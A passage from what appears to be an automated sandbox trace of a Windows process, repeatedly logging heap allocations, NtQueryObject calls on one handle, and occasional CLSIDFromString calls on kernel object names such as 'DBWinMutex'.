ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.583] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.583] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.583] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.583] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.583] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.583] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.583] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.583] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.583] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.583] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.583] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.583] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7a, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0x0 [0114.583] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.583] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.583] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.584] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.584] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.584] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7a, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0x0 [0114.584] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.584] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.584] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.584] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.584] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.584] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7a, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0x0 [0114.584] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.584] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7a, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0x0 [0114.584] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.584] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.585] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.585] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.585] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.585] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7a, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0x0 [0114.585] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.585] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.585] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.585] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.585] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.585] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.585] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.585] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.586] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.586] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x78, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0x0 [0114.586] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x50) returned 0x32e40850 [0114.586] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x1, ObjectInformation=0x32e40850, ObjectInformationLength=0x4c, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0x0 [0114.586] CLSIDFromString (in: lpsz="DBWinMutex", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.586] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.586] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.586] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7a, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0x0 [0114.586] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.586] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7a, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0x0 [0114.586] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.586] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7a, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0x0 [0114.586] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.586] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7a, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0x0 [0114.590] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.590] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.590] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.590] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.590] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.590] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.591] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.591] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.591] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.591] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.591] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.591] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.591] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.591] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.591] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.591] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.591] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.591] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.592] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.592] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.593] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.593] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7a, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0x0 [0114.593] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.593] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.593] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.593] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.593] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.593] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x72, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0x0 [0114.593] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.593] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x72, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0x0 [0114.593] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.593] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.594] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.594] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.594] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.594] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.594] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.594] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.594] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.594] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x78, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0x0 [0114.594] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.594] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x1, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0x0 [0114.594] CLSIDFromString (in: lpsz="FwtSqmSession101457921_S-1-5-18", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.594] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.594] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.594] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7a, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0x0 [0114.595] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.595] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7a, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0x0 [0114.595] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.595] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.595] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.595] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.596] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.596] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.597] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.597] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.597] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.597] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.597] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.597] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.598] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.598] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.598] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.598] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.598] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.598] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.598] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.598] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.598] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.598] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x78, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0x0 [0114.599] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x50) returned 0x32e40850 [0114.599] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x1, ObjectInformation=0x32e40850, ObjectInformationLength=0x4c, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0x0 [0114.599] CLSIDFromString (in: lpsz="DBWinMutex", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.599] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.599] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.599] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.599] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.599] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.599] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.599] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.599] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.599] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.599] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.599] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.600] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.600] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.600] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.600] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7a, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0x0 [0114.600] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.600] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.600] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.600] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7a, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0x0 [0114.600] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.600] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.600] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.600] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.600] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.600] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.601] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.601] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.601] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.601] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.601] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.601] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.602] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.602] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7a, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0x0 [0114.602] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.602] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.602] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.602] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7a, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0x0 [0114.602] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.602] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.602] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.603] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, 